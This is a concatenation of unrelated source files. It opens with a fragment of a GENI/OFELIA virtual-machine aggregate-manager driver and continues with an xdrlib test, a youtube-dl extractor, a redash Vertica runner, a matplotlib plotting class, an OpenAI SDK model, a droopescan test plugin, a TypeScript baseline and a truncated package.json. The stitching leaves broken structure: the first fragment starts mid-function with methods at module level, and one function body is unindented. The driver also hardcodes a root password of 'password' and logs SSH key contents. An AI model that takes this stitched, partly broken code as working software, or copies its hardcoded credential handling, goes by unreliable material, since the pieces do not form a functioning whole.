    xen.hd_origin_path = vm_dict["hd-origin-path"]
    xen.virtualization_setup_type = vm_dict["virtualization-setup-type"]
    xen.memory_mb = int(vm_dict["memory-mb"])
def vm_dict_ifaces_to_class(self, iface_list, iface_class):
    """Copy interface dicts into the XML interfaces container.

    When *iface_list* is empty, a single all-None placeholder interface is
    synthesised so the XML always carries at least one entry. The template
    (empty) interface kept at position 0 is removed at the end.
    """
    iface_class_empty = copy.deepcopy(iface_class.interface[0])
    if not iface_list:
        iface_list = []
        iface = dict()
        iface["gw"] = None
        iface["mac"] = None
        iface["name"] = None
        iface["dns1"] = None
        iface["dns2"] = None
        iface["ip"] = None
        iface["mask"] = None
        iface_list.append(iface)
    for iface in iface_list:
        # Fresh copy of the template for each interface entry
        iface_class_empty = copy.deepcopy(iface_class.interface[0])
        iface_class_empty.gw = iface["gw"]
        iface_class_empty.mac = iface["mac"]
        iface_class_empty.name = iface["name"]
        iface_class_empty.dns1 = iface["dns1"]
        iface_class_empty.dns2 = iface["dns2"]
        iface_class_empty.ip = iface["ip"]
        iface_class_empty.mask = iface["mask"]
        # "ismgmt" is optional; default to the string "false"
        if "ismgmt" in iface.keys():
            iface_class_empty.ismgmt = iface["ismgmt"]
        else:
            iface_class_empty.ismgmt = "false"
        iface_class.interface.append(iface_class_empty)
    iface_class.interface.pop(0) # Deleting the empty interface instance
def __translate_to_allocation_state(self, vm):
    """Map a VM/Reservation object onto the GENI allocation states."""
    # Reservations are merely allocated; real VMs count as provisioned
    return self.GENI_ALLOCATED if isinstance(vm, Reservation) else self.GENI_PROVISIONED
def __translate_to_operational_state(self, vm):
    # TODO Extend
    """
    Defines mapping between OFELIA and GENI states

    Reservations are never operational; for real VMs the textual state is
    pattern-matched. Order matters: "contextualizing..." must be tested
    before the generic "ing..." suffix, which it would also match.
    """
    if isinstance(vm, Reservation):
        return self.GENI_NOT_READY
    else:
        if "running" in vm.state:
            return self.GENI_READY
        elif "contextualizing..." in vm.state:
            return self.GENI_UPDATING_USERS
        elif "ing..." in vm.state:
            return self.GENI_CONFIGURING
        elif "failed" in vm.state:
            return self.GENI_FAILED
        else:
            return self.GENI_NOT_READY
def __add_expiration(self, expiration, project_name, slice_name):
    """Create or refresh the ExpiringComponents row tracking *slice_name*'s expiration."""
    expiring_slivers = ExpiringComponents.objects.filter(slice=slice_name)
    if expiring_slivers:
        # A row already exists: update its expiration time in place
        expiring_sliver = expiring_slivers[0]
        expiring_sliver.expires = expiration
    else:
        expiring_sliver = ExpiringComponents(authority=project_name, slice=slice_name, expires=expiration)
    expiring_sliver.save()
def retrieve_access_data(self, urns, geni_best_effort=False):
    """Collect SSH access info (host name/IP plus login entries) for the VMs behind *urns*."""
    accesses_data = []
    for urn in urns:
        vm_params = self.__urn_to_vm_params(urn)
        vms = VirtualMachine.objects.filter(**vm_params)
        for vm in vms:
            vm_data = dict()
            vm_data["host"] = dict()
            access_data = self.__generate_vt_am_services(vm)
            vm_data["host"]["name"] = vm.name
            vm_data["login"] = []
            for access in access_data:
                # Regroup and filter data to avoid replication
                access = access["login"]
                # Host IP is the same across login entries; keep it once on "host"
                vm_data["host"]["ip"] = access["hostname"]
                access.pop("hostname", None)
                vm_data["login"].append(access)
            accesses_data.append(vm_data)
    return accesses_data
def update_keys(self, urns, geni_users, geni_best_effort=False):
    """
    Store the given users' SSH keys and push them into every matched VM.

    geni_update_users: The credentials[] argument must include credentials over the slice as usual. The options struct must include the geni_users option as specified in AM API v3 and with the semantics described above. This action is only legal on slivers in the geni_ready operational state. This action immediately moves all such slivers to a new geni_updating_users operational state. Slivers stays in that state until the aggregate completes the needed changes, at which time the slivers change back to the geni_ready operational state. Slivers may be in the geni_updating_users state for several minutes; during this time no other operational actions can be taken on the slivers.
    """
    self.set_geni_best_effort_mode(geni_best_effort)
    vms = list()
    resources = list()
    # Collect every VM matched by any of the requested URNs
    for urn in urns:
        params = self.__urn_to_vm_params(urn)
        servers = VTServer.objects.all()
        resources = list()
        for server in servers:
            vms.extend(server.getChildObject().getVMs(**params))
    # Check preconditions (VMs must be in allowed state prior to update the keys)
    # If not on "best effort" mode, honor or revoke all requests
    if not self.get_geni_best_effort_mode():
        for vm in vms:
            # Return "REFUSED" exception if sliver is in a transient state
            self.__validate_precondition_states(vm, "PerformOperationalAction")
            # Only acts on slivers with state "geni_ready"
            if self.__translate_to_operational_state(vm) != self.GENI_READY:
                raise Exception("REFUSED to perform OperationalAction on sliver not ready (maybe stopped or configuring)")
    # Store user's SSH keys
    self.__store_user_keys(geni_users, vms)
    for vm in set(vms):
        try:
            # Return "REFUSED" exception if sliver is in a transient state
            self.__validate_precondition_states(vm, "PerformOperationalAction")
            # Only acts on slivers with state "geni_ready"
            if self.__translate_to_operational_state(vm) != self.GENI_READY:
                raise Exception("REFUSED to perform OperationalAction on sliver not ready (maybe stopped or configuring)")
            else:
                # Contextualize independently of the SSH keys stored this time
                # Note that user might lose access to VM at some point after creation
                ip = self.__get_ip_from_vm(vm)
                vm_dict = self.__vm_to_ssh_keys_params_list(vm, geni_users)
                # If no error was found, change operational status to "geni_updating_users"
                try:
                    # NOTE that this is somewhat insecure
                    vm.state = "contextualizing..." # New state for states similar to self.GENI_UPDATING_USERS
                    vm.save()
                except:
                    pass
                self.__contextualize_vm(vm, ip)
                # Create resources with proper format
                servers = VTServer.objects.all()
                for server in servers:
                    # The server for the VM has been just found
                    # NOTE(review): "params" here still holds the filter of the LAST
                    # urn from the loop above -- confirm this is intended when
                    # several URNs are passed
                    vms = server.getChildObject().getVMs(**params)
                    if vms:
                        # Create resources with proper format
                        resource = self.__convert_to_resources_with_slivers(server, [vm])
                        resources.extend(resource)
        except Exception as e:
            try:
                if self.get_geni_best_effort_mode():
                    # Best effort: report the failure on the sliver and keep going
                    # Create resources with proper format
                    resource = self.__convert_to_resources_with_slivers(server, [vm])[0]
                    resource.set_error_message(str(e))
                    resources.append(resource)
                    continue
                else:
                    raise e
            except Exception as e:
                raise e
        # If no error was found, change operational status back to "geni_ready"
        # (after information of slivers is sent to client)
        try:
            # NOTE that this is somewhat insecure
            vm.state = "running" # New state for states similar to self.GENI_READY
            vm.save()
        except:
            pass
    return resources
def cancel_update_keys(self, urns, geni_best_effort=False):
    """Revert slivers in "geni_updating_users" back to "geni_ready".

    When best-effort mode is off, every matched sliver must currently be
    in geni_updating_users or the whole request is refused up front.
    """
    self.set_geni_best_effort_mode(geni_best_effort)
    vms = list()
    resources = list()
    servers = VTServer.objects.all()
    if not self.get_geni_best_effort_mode():
        for urn in urns:
            params = self.__urn_to_vm_params(urn)
            for server in servers:
                vms = server.getChildObject().getVMs(**params)
                # Check preconditions (VMs must be in allowed state prior to update the keys)
                # If not on "best effort" mode, honor or revoke all requests
                for vm in vms:
                    # NOTE that this method acts on transient states, as it is its aim to revert some of them
                    # Only acts on slivers with state "geni_updating_users"
                    if self.__translate_to_operational_state(vm) != self.GENI_UPDATING_USERS:
                        raise Exception("REFUSED to perform OperationalAction on sliver that had not updated users")
    for urn in urns:
        params = self.__urn_to_vm_params(urn)
        resources = list()
        for server in servers:
            # The server for the VM has been just found
            vms = server.getChildObject().getVMs(**params)
            for vm in vms:
                try:
                    # Only acts on slivers with state "geni_updating_users"
                    if self.__translate_to_operational_state(vm) != self.GENI_UPDATING_USERS:
                        raise Exception("REFUSED to perform OperationalAction on sliver that had not updated users")
                    else:
                        # If no error was found, change operational status to "geni_ready"
                        try:
                            # NOTE that this is somewhat insecure
                            vm.state = "running" # State equivalent to self.GENI_READY
                            vm.save()
                        except:
                            pass
                except Exception as e:
                    try:
                        if self.get_geni_best_effort_mode():
                            # Best effort: report the failure on the sliver and keep going
                            # Create resources with proper format
                            resource = self.__convert_to_resources_with_slivers(server, [vm])[0]
                            resource.set_error_message(str(e))
                            resources.append(resource)
                            continue
                        else:
                            raise e
                    except Exception as e:
                        raise e
                # Create resources with proper format
                resource = self.__convert_to_resources_with_slivers(server, [vm])
                resources.extend(resource)
    return resources
def __contextualize_vm(self, vm, ip):
    """Push the stored users' SSH public keys into the (started) VM at *ip*.

    Keys are grouped per user and handed to a background process.
    Fix: re-raise with a bare ``raise`` instead of ``raise e`` so the
    original traceback is preserved.
    """
    # SSH keys for users are passed to the VM right after it is started
    vm_keys = VirtualMachineKeys.objects.filter(slice_uuid=vm.sliceId, project_uuid=vm.projectId)
    params = {
        "vm_address": str(ip) ,
        "vm_user": "root",
        "vm_password": "password",
    }
    vm_context = VMContextualize(**params)
    try:
        user_keys = {}
        for vm_key in vm_keys:
            user_name = str(vm_key.get_user_name())
            # Group every key under its owning user
            if user_name not in user_keys:
                user_keys[user_name] = [ vm_key.get_ssh_key() ]
            else:
                user_keys[user_name].append(vm_key.get_ssh_key())
            logging.debug("Adding %s's public key(s) into VM. Key contents: %s" % (vm_key.get_user_name(), user_keys[str(vm_key.get_user_name())]))
        # Placing a number of keys per user, multiple users
        if len(user_keys) > 0:
            with self.__mutex_process:
                # FIXME Sometimes do not work properly and keys are not getting to the VM
                ServiceProcess.startMethodInNewProcess(vm_context.contextualize_add_pub_keys,
                    [user_keys], self.__agent_callback_url)
    except Exception:
        # Bare raise keeps the original traceback intact
        raise
def __vm_to_ssh_keys_params_list(self, vm, users=None):
    """Expand *vm* plus the given users/keys into VirtualMachineKeys filter dicts.

    Returns one params dict per (user, key) pair; when *users* is empty a
    single dict identifying only the VM is returned.

    Fix: the mutable default argument ``users=[]`` was replaced by None
    (behaviorally identical for all existing callers).
    """
    if users is None:
        users = []
    params_list = list()
    params = {"project_uuid": vm.projectId,
              "slice_uuid": vm.sliceId,
              "vm_uuid": vm.uuid,
              }
    if not users:
        params_list.append(params)
    for user in users:
        # Reuse "params" structure by operating on a new structure
        params_user = copy.deepcopy(params)
        # Retrieve user string from URN
        user_id_key = "urn"
        if user_id_key not in user:
            # Get the other key that's not the user's keys
            # Depending on client: "urn", "name", ...
            user_id_key = set(user.keys()) - set(["keys"])
            user_id_key = user_id_key.pop()
        try:
            user_name = urn_to_hrn(user[user_id_key])[0].split(".")[-1]
        except:
            # Fall back to the raw identifier when it is not a parseable URN
            user_name = user[user_id_key]
        params_user.update({"user_name": user_name,})
        for key in user["keys"]:
            params_user_keys = copy.deepcopy(params_user)
            params_user_keys.update({"ssh_key": key,})
            params_list.append(params_user_keys)
    return params_list
def __store_user_keys(self, users, vms):
    """Persist each user's SSH keys for every VM.

    Returns True if at least one new key entry was stored; storage
    failures are logged and swallowed (best effort).
    """
    stored_keys = False
    try:
        # Wrap users into list, if not already
        if not isinstance(users, list):
            users = [users]
        for vm in vms:
            params_list = self.__vm_to_ssh_keys_params_list(vm, users)
            # Create N entries, each for a specific key
            for params in params_list:
                # If SSH key is not yet stored
                if not VirtualMachineKeys.objects.filter(**params):
                    key_entry = VirtualMachineKeys(**params)
                    key_entry.save()
                    stored_keys = True
    except Exception as e:
        logging.error("Could not store user SSH key. Details: %s" % str(e))
    return stored_keys
def get_config(self):
    """Return the configuration object backing this driver."""
    config = self.__config
    return config
def set_config(self, value):
    """Replace the configuration object backing this driver."""
    self.__config = value
import unittest
import xdrlib
class XDRTest(unittest.TestCase):
    """Round-trip test: pack a sample of every XDR type, then unpack and compare.

    NOTE(review): xdrlib is deprecated since Python 3.11 and removed in 3.13.
    """

    def test_xdr(self):
        p = xdrlib.Packer()
        s = b'hello world'
        a = [b'what', b'is', b'hapnin', b'doctor']
        p.pack_int(42)
        p.pack_int(-17)
        p.pack_uint(9)
        p.pack_bool(True)
        p.pack_bool(False)
        p.pack_uhyper(45)
        p.pack_float(1.9)
        p.pack_double(1.9)
        p.pack_string(s)
        p.pack_list(range(5), p.pack_uint)
        p.pack_array(a, p.pack_string)
        # now verify
        data = p.get_buffer()
        up = xdrlib.Unpacker(data)
        self.assertEqual(up.get_position(), 0)
        self.assertEqual(up.unpack_int(), 42)
        self.assertEqual(up.unpack_int(), -17)
        self.assertEqual(up.unpack_uint(), 9)
        self.assertTrue(up.unpack_bool() is True)
        # remember position
        pos = up.get_position()
        self.assertTrue(up.unpack_bool() is False)
        # rewind and unpack again
        up.set_position(pos)
        self.assertTrue(up.unpack_bool() is False)
        self.assertEqual(up.unpack_uhyper(), 45)
        # floats go through 32/64-bit IEEE encodings; compare approximately
        self.assertAlmostEqual(up.unpack_float(), 1.9)
        self.assertAlmostEqual(up.unpack_double(), 1.9)
        self.assertEqual(up.unpack_string(), s)
        self.assertEqual(up.unpack_list(up.unpack_uint), list(range(5)))
        self.assertEqual(up.unpack_array(up.unpack_string), a)
        up.done()
        # after done(), the buffer is exhausted
        self.assertRaises(EOFError, up.unpack_uint)
class ConversionErrorTest(unittest.TestCase):
    """Verify that Packer raises ConversionError on non-numeric input."""

    def setUp(self):
        self.packer = xdrlib.Packer()

    def assertRaisesConversion(self, *args):
        # Convenience wrapper kept for API compatibility
        self.assertRaises(xdrlib.ConversionError, *args)

    def test_pack_int(self):
        self.assertRaises(xdrlib.ConversionError, self.packer.pack_int, 'string')

    def test_pack_uint(self):
        self.assertRaises(xdrlib.ConversionError, self.packer.pack_uint, 'string')

    def test_float(self):
        self.assertRaises(xdrlib.ConversionError, self.packer.pack_float, 'string')

    def test_double(self):
        self.assertRaises(xdrlib.ConversionError, self.packer.pack_double, 'string')

    def test_uhyper(self):
        self.assertRaises(xdrlib.ConversionError, self.packer.pack_uhyper, 'string')
if __name__ == "__main__":
    # Allow running this test module directly via unittest's CLI entry point
    unittest.main()
# coding: utf-8
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..compat import (
compat_b64decode,
compat_urllib_parse_unquote,
)
class BigflixIE(InfoExtractor):
    """Extractor for bigflix.com movie pages.

    Video URLs are embedded URL-quoted + base64-encoded; height-tagged
    'ContentURL_<height>p' variables carry the formats, with an optional
    'file=' fallback URL.
    Fix: the fallback URL was decoded twice; the already-decoded value is
    now reused when appending it to the formats list.
    """
    _VALID_URL = r'https?://(?:www\.)?bigflix\.com/.+/(?P<id>[0-9]+)'
    _TESTS = [{
        # 2 formats
        'url': 'http://www.bigflix.com/Tamil-movies/Drama-movies/Madarasapatinam/16070',
        'info_dict': {
            'id': '16070',
            'ext': 'mp4',
            'title': 'Madarasapatinam',
            'description': 'md5:9f0470b26a4ba8e824c823b5d95c2f6b',
            'formats': 'mincount:2',
        },
        'params': {
            'skip_download': True,
        }
    }, {
        # multiple formats
        'url': 'http://www.bigflix.com/Malayalam-movies/Drama-movies/Indian-Rupee/15967',
        'only_matching': True,
    }]

    def _real_extract(self, url):
        video_id = self._match_id(url)

        webpage = self._download_webpage(url, video_id)

        title = self._html_search_regex(
            r'<div[^>]+class=["\']pagetitle["\'][^>]*>(.+?)</div>',
            webpage, 'title')

        def decode_url(quoted_b64_url):
            # URL-quoted base64 -> plain UTF-8 URL
            return compat_b64decode(compat_urllib_parse_unquote(
                quoted_b64_url)).decode('utf-8')

        formats = []
        for height, encoded_url in re.findall(
                r'ContentURL_(\d{3,4})[pP][^=]+=([^&]+)', webpage):
            video_url = decode_url(encoded_url)
            f = {
                'url': video_url,
                'format_id': '%sp' % height,
                'height': int(height),
            }
            if video_url.startswith('rtmp'):
                f['ext'] = 'flv'
            formats.append(f)

        file_url = self._search_regex(
            r'file=([^&]+)', webpage, 'video url', default=None)
        if file_url:
            video_url = decode_url(file_url)
            # Only append the fallback URL if it was not already collected
            if all(f['url'] != video_url for f in formats):
                formats.append({
                    'url': video_url,
                })

        self._sort_formats(formats)

        description = self._html_search_meta('description', webpage)

        return {
            'id': video_id,
            'title': title,
            'description': description,
            'formats': formats
        }
import sys
import json
import logging
from redash.utils import JSONEncoder
from redash.query_runner import *
logger = logging.getLogger(__name__)
# Map Vertica column type codes (as reported in the vertica_python cursor
# description) to redash column types; unknown codes fall back to None
# via types_map.get() in run_query.
types_map = {
    5: TYPE_BOOLEAN,
    6: TYPE_INTEGER,
    7: TYPE_FLOAT,
    8: TYPE_STRING,
    9: TYPE_STRING,
    10: TYPE_DATE,
    11: TYPE_DATETIME,
    12: TYPE_DATETIME,
    13: TYPE_DATETIME,
    14: TYPE_DATETIME,
    15: TYPE_DATETIME,
    16: TYPE_FLOAT,
    17: TYPE_STRING,
    114: TYPE_DATETIME,
    115: TYPE_STRING,
    116: TYPE_STRING,
    117: TYPE_STRING
}
class Vertica(BaseSQLQueryRunner):
    """redash query runner for HP Vertica (via the vertica_python driver)."""
    noop_query = "SELECT 1"

    @classmethod
    def configuration_schema(cls):
        """JSON schema describing the connection settings shown in the redash UI."""
        return {
            'type': 'object',
            'properties': {
                'host': {
                    'type': 'string'
                },
                'user': {
                    'type': 'string'
                },
                'password': {
                    'type': 'string',
                    'title': 'Password'
                },
                'database': {
                    'type': 'string',
                    'title': 'Database name'
                },
                "port": {
                    "type": "number"
                },
            },
            'required': ['database'],
            'secret': ['password']
        }

    @classmethod
    def enabled(cls):
        """The runner is only available when vertica_python is importable."""
        try:
            import vertica_python
        except ImportError:
            return False
        return True

    def __init__(self, configuration):
        super(Vertica, self).__init__(configuration)

    def _get_tables(self, schema):
        """Populate *schema* with table and view columns; returns its values."""
        query = """
        Select table_schema, table_name, column_name from columns where is_system_table=false
        union all
        select table_schema, table_name, column_name from view_columns;
        """

        results, error = self.run_query(query, None)

        if error is not None:
            raise Exception("Failed getting schema.")

        results = json.loads(results)

        for row in results['rows']:
            table_name = '{}.{}'.format(row['table_schema'], row['table_name'])

            if table_name not in schema:
                schema[table_name] = {'name': table_name, 'columns': []}

            schema[table_name]['columns'].append(row['column_name'])

        return schema.values()

    def run_query(self, query, user):
        """Execute *query* against Vertica; returns a (json_data, error) tuple."""
        # Deferred import: only required when a query is actually executed
        import vertica_python

        if query == "":
            json_data = None
            error = "Query is empty"
            return json_data, error

        connection = None
        try:
            conn_info = {
                'host': self.configuration.get('host', ''),
                'port': self.configuration.get('port', 5433),
                'user': self.configuration.get('user', ''),
                'password': self.configuration.get('password', ''),
                'database': self.configuration.get('database', '')
            }
            connection = vertica_python.connect(**conn_info)
            cursor = connection.cursor()
            # NOTE(review): "Vetica" typo in the log message -- left untouched here
            logger.debug("Vetica running query: %s", query)
            cursor.execute(query)

            # TODO - very similar to pg.py
            if cursor.description is not None:
                columns_data = [(i[0], i[1]) for i in cursor.description]

                rows = [dict(zip((c[0] for c in columns_data), row)) for row in cursor.fetchall()]
                columns = [{'name': col[0],
                            'friendly_name': col[0],
                            'type': types_map.get(col[1], None)} for col in columns_data]

                data = {'columns': columns, 'rows': rows}
                json_data = json.dumps(data, cls=JSONEncoder)
                error = None
            else:
                json_data = None
                error = "No data was returned."

            cursor.close()
        except KeyboardInterrupt:
            error = "Query cancelled by user."
            json_data = None
        except Exception as e:
            # Python 2 three-expression raise: re-raises the original
            # exception with its original traceback
            raise sys.exc_info()[1], None, sys.exc_info()[2]
        finally:
            if connection:
                connection.close()

        return json_data, error
# Expose this query runner to redash's runner registry
register(Vertica)
###############################################################################
#
# AbstractPlot.py - Abstract base class for plotting.
#
###############################################################################
# #
# This program is free software: you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation, either version 3 of the License, or #
# (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
# #
###############################################################################
from matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas
from matplotlib.figure import Figure
import matplotlib.transforms as mtransforms
from matplotlib.patches import Rectangle
import matplotlib as mpl
import numpy as np
class AbstractPlot(FigureCanvas):
    '''
    Abstract base class for plotting.

    Wraps a matplotlib Agg canvas, applies global font settings from the
    supplied options object, and offers helpers for measuring tick-label
    extents, formatting numeric labels and drawing bounding boxes.
    '''
    def __init__(self, options):
        self.options = options

        # Global plot settings (applied process-wide via rcParams)
        mpl.rcParams['font.size'] = self.options.font_size
        mpl.rcParams['axes.titlesize'] = self.options.font_size
        mpl.rcParams['axes.labelsize'] = self.options.font_size
        mpl.rcParams['xtick.labelsize'] = self.options.font_size
        mpl.rcParams['ytick.labelsize'] = self.options.font_size
        mpl.rcParams['legend.fontsize'] = self.options.font_size
        mpl.rcParams['svg.fonttype'] = 'none'

        self.fig = Figure(facecolor='white', dpi=options.dpi)

        FigureCanvas.__init__(self, self.fig)

        self.cid = None

        self.type = '<none>'
        self.name = '<none>'

        self.axesColour = (0.5, 0.5, 0.5)

    def savePlot(self, filename, dpi=300):
        """Save the figure; the format is taken from the filename extension.

        Unsupported extensions are silently ignored.
        """
        imgFormat = filename[filename.rfind('.')+1:len(filename)]
        if imgFormat in ['png', 'pdf', 'ps', 'eps','svg']:
            self.fig.savefig(filename,format=imgFormat,dpi=dpi,facecolor='white',edgecolor='white')
        else:
            pass

    def labelExtents(self, xLabels, xFontSize, xRotation, yLabels, yFontSize, yRotation):
        """Measure x and y tick-label bounding boxes (in figure coordinates).

        Renders the labels on a temporary full-figure axes, unions their
        window extents, and clears the figure again.

        NOTE(review): Bbox.inverse_transformed was removed in newer
        matplotlib releases (use transformed(t.inverted()) there).
        """
        self.fig.clear()

        tempAxes = self.fig.add_axes([0,0,1.0,1.0])

        tempAxes.set_xticks(np.arange(len(xLabels)))
        tempAxes.set_yticks(np.arange(len(yLabels)))

        xText = tempAxes.set_xticklabels(xLabels, size=xFontSize, rotation=xRotation)
        yText = tempAxes.set_yticklabels(yLabels, size=yFontSize, rotation=yRotation)

        bboxes = []
        for label in xText:
            bbox = label.get_window_extent(self.get_renderer())
            bboxi = bbox.inverse_transformed(self.fig.transFigure)
            bboxes.append(bboxi)
        xLabelBounds = mtransforms.Bbox.union(bboxes)

        bboxes = []
        for label in yText:
            bbox = label.get_window_extent(self.get_renderer())
            bboxi = bbox.inverse_transformed(self.fig.transFigure)
            bboxes.append(bboxi)
        yLabelBounds = mtransforms.Bbox.union(bboxes)

        self.fig.clear()

        return xLabelBounds, yLabelBounds

    def xLabelExtents(self, labels, fontSize, rotation=0):
        """Measure only the x tick-label bounding box (figure coordinates)."""
        self.fig.clear()

        tempAxes = self.fig.add_axes([0,0,1.0,1.0])

        tempAxes.set_xticks(np.arange(len(labels)))
        xLabels = tempAxes.set_xticklabels(labels, size=fontSize, rotation=rotation)

        bboxes = []
        for label in xLabels:
            bbox = label.get_window_extent(self.get_renderer())
            bboxi = bbox.inverse_transformed(self.fig.transFigure)
            bboxes.append(bboxi)
        xLabelBounds = mtransforms.Bbox.union(bboxes)

        self.fig.clear()

        return xLabelBounds

    def yLabelExtents(self, labels, fontSize, rotation=0):
        """Measure only the y tick-label bounding box (figure coordinates)."""
        self.fig.clear()

        tempAxes = self.fig.add_axes([0,0,1.0,1.0])

        tempAxes.set_yticks(np.arange(len(labels)))
        yLabels = tempAxes.set_yticklabels(labels, size=fontSize, rotation=rotation)

        bboxes = []
        for label in yLabels:
            bbox = label.get_window_extent(self.get_renderer())
            bboxi = bbox.inverse_transformed(self.fig.transFigure)
            bboxes.append(bboxi)
        yLabelBounds = mtransforms.Bbox.union(bboxes)

        self.fig.clear()

        return yLabelBounds

    def formatLabels(self, labels):
        """Reformat numeric tick labels: scientific notation below 0.01, else 3 decimals."""
        formattedLabels = []
        for label in labels:
            value = float(label.get_text())
            if value < 0.01:
                valueStr = '%.2e' % value
                # Trim leading zeros from the exponent ("e-005" -> "e-5")
                if 'e-00' in valueStr:
                    valueStr = valueStr.replace('e-00', 'e-')
                elif 'e-0' in valueStr:
                    valueStr = valueStr.replace('e-0', 'e-')
            else:
                valueStr = '%.3f' % value

            formattedLabels.append(valueStr)

        return formattedLabels

    def removeExtraZeros(self, label):
        """Strip trailing zeros (and a dangling decimal point) from a numeric label."""
        if '.' in label:
            while label[-1] == '0':
                label = label[0:-1]

        if label[-1] == '.': # remove potential trailing decimal point
            label = label[0:-1]

        return label

    def boundingBox(self, data, ax, label, bBoundingBoxes, bLabels):
        ''' Draw bounding box around data.'''
        data = np.array(data)
        width = max(data[:,0]) - min(data[:,0])
        height = max(data[:,1]) - min(data[:,1])
        r = Rectangle((min(data[:,0]), min(data[:,1])), width, height)

        if bBoundingBoxes:
            ax.add_artist(r)
            r.set_clip_box(ax.bbox)
            r.set_alpha(0.1)
            r.set_facecolor((0.5, 0.5, 0.5))

        if bLabels:
            # Annotate the top-left corner of the box
            ax.annotate(label, xy = (min(data[:,0]), max(data[:,1])), xytext = (0, 0),
                    textcoords = 'offset points', ha = 'right', va = 'bottom',
                    bbox = dict(boxstyle = 'round,pad=0.5', fc = (0.5, 0.5, 0.5), alpha = 0.1), zorder=10)
# File generated from our OpenAPI spec by Stainless. See CONTRIBUTING.md for details.
from typing_extensions import Literal
from ..._models import BaseModel
__all__ = ["ResponseAudioDoneEvent"]
class ResponseAudioDoneEvent(BaseModel):
    """Emitted when the audio response is complete."""

    sequence_number: int
    """The sequence number of the event."""

    type: Literal["response.audio.done"]
    """The type of the event. Always `response.audio.done`."""
from cement.core import handler, controller
from dscan.plugins import HumanBasePlugin
from subprocess import call
import os, sys, dscan
# Presumably the default Drupal docroot used by the test suite -- not
# referenced in the visible code below; confirm before removing.
BASE_FOLDER = '/var/www/drupal/'
# Major Drupal versions covered -- likewise not referenced below.
UPDATE_MAJOR = ['6', '7']
def recursive_grep(directory, needle):
    """Return the first '.py' file in *directory* containing *needle*, or None.

    *directory* must end with a path separator (it is concatenated with
    the file name directly). Despite the name, the scan is not recursive.
    """
    for candidate in os.listdir(directory):
        if not candidate.endswith('.py'):
            continue
        with open(directory + candidate, 'r') as handle:
            if any(needle in line for line in handle):
                return candidate
    return None
class Tests(HumanBasePlugin):
    """Hidden droopescan controller that runs the project's nosetests suite.

    Fixes: the ``-2`` flag's help text wrongly said "python 3 tests", and
    the local ``exit`` variable shadowed the builtin (renamed exit_code).
    """
    class Meta:
        label = 'test'
        stacked_on = 'base'
        stacked_type = 'nested'
        hide = True
        arguments = [
            (['-s', '--single-test'], dict(action='store', help='Name of test to run',
                required=False, default=None)),
            (['-3', '--just-three'], dict(action='store_true', help='Just run python 3 tests.',
                required=False, default=None)),
            (['-2', '--just-two'], dict(action='store_true', help='Just run python 2 tests.',
                required=False, default=None)),
            (['-c', '--with-coverage'], dict(action='store_true', help='Do test coverage',
                required=False, default=False)),
        ]

    @controller.expose(help='', hide=True)
    def default(self):
        """Run the whole suite (optionally with coverage) or a single named test."""
        env = {}
        single_test = self.app.pargs.single_test
        with_coverage = self.app.pargs.with_coverage
        just_three = self.app.pargs.just_three
        just_two = self.app.pargs.just_two
        if single_test and with_coverage:
            self.error('Cannot run with both -c and -s.')
        exit_code = 0
        if not single_test:
            call_base = ['/usr/local/bin/nosetests', '--exclude=async']
            if with_coverage:
                call_base += ['--with-coverage', '--cover-package', 'dscan',
                    '--cover-inclusive', '--cover-html']
            # Run under python2 and python3 unless one was excluded
            if not just_three:
                e1 = call(['python2'] + call_base, env=env)
            else:
                e1 = 0
            if not just_two:
                e2 = call(['python3'] + call_base, env=env)
            else:
                e2 = 0
            if e1 != 0 or e2 != 0:
                exit_code = 1
        else:
            # Locate the tests file that defines the requested test name
            test_file = recursive_grep(dscan.PWD + 'tests/', single_test + "(")
            if not test_file:
                self.error('No test found with name "%s"' % single_test)
            appendix = 'tests.py'
            # "foo_bar_tests.py" -> module "foo_bar_tests", class "FooBarTests"
            tna = test_file[0:-1 * len(appendix) - 1].split('_')
            underscore = '_'.join(tna)
            upper = "".join(w.capitalize() for w in tna)
            test = 'dscan.tests.%s_tests:%sTests.%s' % (underscore, upper, single_test)
            if just_two:
                exit_code = call(['python2', '/usr/local/bin/nosetests', '--nocapture', test], env=env)
            else:
                exit_code = call(['python3', '/usr/local/bin/nosetests', '--nocapture', test], env=env)
        sys.exit(exit_code)
def load(app=None):
# Cement plugin hook: called at application setup to register this controller.
handler.register(Tests)
//// [tests/cases/compiler/classDeclarationShouldBeOutOfScopeInComputedNames.ts] ////
//// [classDeclarationShouldBeOutOfScopeInComputedNames.ts]
class A {
static readonly p1 = Symbol();
static readonly p2 = Symbol();
// All of the below should be out of scope or TDZ - `A` has not finished being constructed as they are executed
static readonly [A.p1] = 0;
static [A.p2]() { return 0 };
[A.p1]() { }
[A.p2] = 0
}
//// [classDeclarationShouldBeOutOfScopeInComputedNames.js]
"use strict";
var _a, _b;
class A {
constructor() {
this[_b] = 0;
}
static [(_a = A.p1, A.p2)]() { return 0; }
;
[A.p1]() { }
}
_b = A.p2;
A.p1 = Symbol();
A.p2 = Symbol();
// All of the below should be out of scope or TDZ - `A` has not finished being constructed as they are executed
A[_a] = 0; | javascript | github | https://github.com/microsoft/TypeScript | tests/baselines/reference/classDeclarationShouldBeOutOfScopeInComputedNames.js |
{
"name": "@prometheus-io/codemirror-promql",
"version": "0.309.1",
"description": "a CodeMirror mode for the PromQL language",
"types": "dist/esm/index.d.ts",
"module": "dist/esm/index.js",
"main": "dist/cjs/index.js",
"scripts": {
"build": "npm run build:lib",
"build:lib": "bash ./build.sh",
"test": "NODE_OPTIONS=--experimental-vm-modules jest --runInBand",
"lint": "eslint src/ --ext .ts",
"lint:fix": "eslint --fix src/ --ext .ts"
},
"repository": {
"type": "git",
"url": "git+https://github.com/prometheus/prometheus.git"
},
"keywords": [
"promql",
"codemirror",
"mode",
"prometheus"
],
"author": "Prometheus Authors <prometheus-developers@googlegroups.com>",
"license": "Apache-2.0",
"bugs": {
"url": "https://github.com/prometheus/prometheus/issues"
},
"homepage": "https://github.com/prometheus/prometheus/blob/main/web/ui/module/codemirror-promql/README.md",
"dependencies": {
"@prometheus-io/lezer-promql": "0.309.1",
"lru-cache": "^11.2.5"
},
"devDependencies": {
